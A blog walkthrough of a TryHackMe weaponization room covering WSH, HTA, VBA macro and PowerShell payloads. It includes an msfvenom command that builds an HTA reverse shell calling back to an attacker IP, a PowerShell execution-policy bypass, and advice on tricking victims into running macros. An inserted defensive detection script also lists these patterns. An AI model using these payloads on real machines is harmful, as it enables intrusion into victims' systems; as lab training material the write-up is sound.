Hello world and welcome to HaXeZ. In this post I’m going through the Weaponization room on TryHackMe. Until now, the rooms haven’t been that hands-on; this one steps it up a bit and has us create payloads for exploiting machines. Consequently, I’m going to try to reduce the reproduction of the content that THM has already created and focus on working through the solutions themselves.
Weaponization Cyber Kill Chain
The introduction to the room starts by explaining where weaponization falls within the cyber kill chain. As you can see from the image below, weaponization is the second stage. The image has been taken from TryHackMe.
The room then explains that weaponization is the part of the engagement where the Red Teamer generates payloads to exploit the target. It goes on to explain that some organizations block or monitor the execution of .exe files, but that there are alternatives such as the ones listed below.
- The Windows Script Host (WSH)
- An HTML Application (HTA)
- Visual Basic Applications (VBA)
- PowerShell (PSH)
Windows Script Host Weaponization
Windows operating systems have a built-in tool for running batch files called Windows Script Host. This scripting host allows for the execution of certain scripts. The room challenges us to write a script that creates a message box that says “Welcome to THM”. This can be achieved with the following code, which can then be double-clicked or run from the command line.
Dim message
message = "Welcome to THM"
MsgBox message
Next, the room challenges you to produce a script that launches the calculator. This is fairly simple, as it provides the script you need to run. It then asks you to produce a script that launches cmd.exe by replacing calc.exe with cmd.exe. However, this didn’t work for me. I did a bit of googling but didn’t find a solution.
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
HTML Application Weaponization
HTML Applications are insanely cool. They allow you to create a file, host it on a web server, and wait for an unsuspecting victim to click and run it. If the victim gives the application permission to run, it can grant the attacker access to their machine. For example, the snippet of code below can be hosted using the Python HTTP module and, if run by a victim, would open a command prompt.
<html>
<body>
<script>
  var c = 'cmd.exe';
  new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
You can also use msfvenom to create an HTA file carrying a reverse shell payload. This can likewise be hosted on a web server and, if run by the victim, would grant the attacker access to their machine. For example, the command below creates an HTA application with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta
However, a far simpler way of performing this type of attack is to use the hta_server module in Metasploit. This module requires hardly any configuration and automatically hosts the application for you. All the attacker needs to do is send the link to the victim and wait for them to run it.
Visual Basic for Applications Weaponization
Visual Basic for Applications is another really cool way of delivering a payload. For example, Microsoft Office documents support macros, which can be used to execute Visual Basic. Macros can be accessed by clicking View, then Macros. You then need to give the macro a name and provide the script to be executed. For example, the script below will run calc.exe.
Sub PoC()
    Dim payload As String
    payload = "calc.exe"
    CreateObject("Wscript.Shell").Run payload,0
End Sub
There is a lot more to this section, which you should definitely read through, but this covers the basics. This is something I will definitely be adding to my list of exploits, as it is very powerful if you can trick a user into running macros.
PowerShell Weaponization
PowerShell scripts are great for compromising machines. PowerShell can execute a reverse shell directly, or it can download an externally hosted payload and execute that to create a reverse shell. However, one problem we may face when executing PowerShell scripts is the execution policy. This can be overridden with the simple command below.
powershell -ex bypass -File thm.ps1
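As an added defensive counterpart (this is not part of the original post or of the THM room), here is a small Python triage script that flags process-creation events matching the four techniques covered above: WSH running a script file, mshta launching an HTA from a URL, an Office process spawning a shell (the macro case), and PowerShell started with the execution-policy bypass. The event tuples are constructed samples; the (parent, image, command line) layout, the file names and the sample IP are assumptions.

```python
import re

# Constructed sample process-creation events (parent image, image, command line).
# These are made-up log lines for illustration, not real telemetry.
SAMPLE_EVENTS = [
    ("explorer.exe", "wscript.exe", r'wscript.exe "C:\Users\demo\Downloads\thm.vbs"'),
    ("chrome.exe", "mshta.exe", "mshta.exe http://10.8.232.37:8080/thm.hta"),
    ("winword.exe", "cmd.exe", "cmd.exe /c calc.exe"),
    ("cmd.exe", "powershell.exe", "powershell -ex bypass -File thm.ps1"),
    ("explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
    ("services.exe", "powershell.exe", r"powershell.exe -File C:\ops\backup.ps1"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# -ex / -exec / -ExecutionPolicy / -ep followed by bypass or unrestricted
EP_BYPASS = re.compile(r"-e(x\w*|p)\s+(bypass|unrestricted)", re.I)
WSH_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)
HTA_REMOTE = re.compile(r"https?://|\.hta\b", re.I)


def classify(parent, image, cmdline):
    """Return the names of the rules an event trips (empty list if nothing matched)."""
    hits = []
    image = image.lower()
    parent = parent.lower()
    if image in ("wscript.exe", "cscript.exe") and WSH_EXT.search(cmdline):
        hits.append("wsh_script")            # VBScript/JScript via Windows Script Host
    if image == "mshta.exe" and HTA_REMOTE.search(cmdline):
        hits.append("hta_launch")            # HTA run by mshta, here from a URL
    if parent in OFFICE and image in SHELLS:
        hits.append("office_child_shell")    # macro spawning a shell (VBA section)
    if image == "powershell.exe" and EP_BYPASS.search(cmdline):
        hits.append("ps_execpolicy_bypass")  # -ex bypass / -ep unrestricted
    return hits


def scan(events):
    """Return [(cmdline, [rules...])] for every event that trips at least one rule."""
    return [(c, r) for p, i, c in events if (r := classify(p, i, c))]


if __name__ == "__main__":
    for cmdline, rules in scan(SAMPLE_EVENTS):
        print(f"{', '.join(rules):24} {cmdline}")
```

The last two sample events (Notepad, and a PowerShell script run without any policy override) are there to show the rules stay quiet on ordinary activity.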
Command And Control – (C2 Or C&C)
This section of the room covers information about C2s, or Command and Control. However, we have covered these in more detail in the Intro to C2 room. It is still worth reading through this information to reinforce what was learned there. There are no questions to answer here.
Delivery Techniques
This section of the room talks about the various delivery techniques used by threat actors. It’s fairly standard in that the usual suspects are present: it discusses email delivery, web delivery, and USB delivery. There is a great episode of Mr. Robot which demonstrates the effectiveness of USB delivery. Elliot drops a bunch of Rubber Duckies outside a police station, and an officer picks one up and plugs it into their computer. While the payload was caught by the antivirus, it does demonstrate how they can be used. If you’re looking for a way to make your own USB Rubber Ducky, check out my guide on how to use a Digispark.
In order to complete the practice arena, I used the hta_server Metasploit module mentioned previously. It didn’t require any configuration; all it needed was the URL that Metasploit automatically generates. Next, you paste the URL into the web application and it downloads and executes the payload. The flag can be found below. I would, however, strongly encourage you to do this yourself rather than copying and pasting the answer.